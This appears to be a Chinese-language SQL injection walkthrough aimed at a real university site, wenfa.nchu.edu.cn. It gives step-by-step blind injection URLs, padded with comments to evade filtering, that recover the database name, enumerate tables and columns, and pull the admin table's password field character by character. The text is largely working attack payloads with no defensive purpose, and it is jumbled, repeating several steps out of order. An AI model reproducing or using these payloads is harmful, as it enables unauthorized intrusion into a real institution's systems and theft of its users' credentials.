wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top /**/1/**/name/**/from/**/文法學院.sys.all_objects where type='U'/**/AND/**/is_ms_shipped=0 and name not in('Tb_SysUser')),1,1))>0/**/--&t=0
【4】爆Tb_SysUser 表的字段:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/ 1/**/COLUMN_NAME from/**/文法學院.information_schema.columns/**/where/** /TABLE_NAME='Tb_SysUser'),1,1))>0/**/--&t=0
爆第二個字段:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/ 1/**/COLUMN_NAME/**/ from/**/文法學院.information_schema.columns/**/where/** /TABLE_NAME='Tb_SysUser'/**/and/**/COLUMN_NAME/**/not/**/in('fPwd')),1,1))>0/**/--&t=0
【5】爆數據
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/fPwd/**/from/**/Tb_SysUser),1,1))>0/**/--&t=0
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring(db_name(),1,1))>200/**/--&t=0
ascii大於140發現頁面正常,則當前的數據庫的名字為中文,則換成這樣注入:wenfa.nchu.edu.cn/md.aspx?c=c1' /**/and/**/unicode(substring(db_name(),1,1))>200/**/--&t=0
最后發現:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/unicode(substring(db_name(),1,1))=25991/**/--&t=0
在http://www.bangnishouji.com/tools/chtounicode.html查詢
文 轉換成中文,就是“文”字
最后注入發現當前數據庫的為:文法學院
【3】爆表
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1 name/**/from/**/文法學院.sys.all_objects where type='U'/**/AND/**/is_ms_shipped=0),1,1))>0/**/--&t=0
爆第二張表:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top /**/1/**/name/**/from/**/文法學院.sys.all_objects where type='U'/**/AND/**/is_ms_shipped=0 and name not in('Tb_SysUser')),1,1))>0/**/--&t=0
【4】爆Tb_SysUser 表的字段:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/ 1/**/COLUMN_NAME from/**/文法學院.information_schema.columns/**/where/** /TABLE_NAME='Tb_SysUser'),1,1))>0/**/--&t=0
爆第二個字段:
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/ 1/**/COLUMN_NAME/**/ from/**/文法學院.information_schema.columns/**/where/** /TABLE_NAME='Tb_SysUser'/**/and/**/COLUMN_NAME/**/not/**/in('fPwd')),1,1))>0/**/--&t=0
【5】爆數據
wenfa.nchu.edu.cn/md.aspx?c=c1'/**/and/**/ascii(substring((select/**/top/**/1/**/fPwd/**/from/**/Tb_SysUser),1,1))>0/**/--&t=0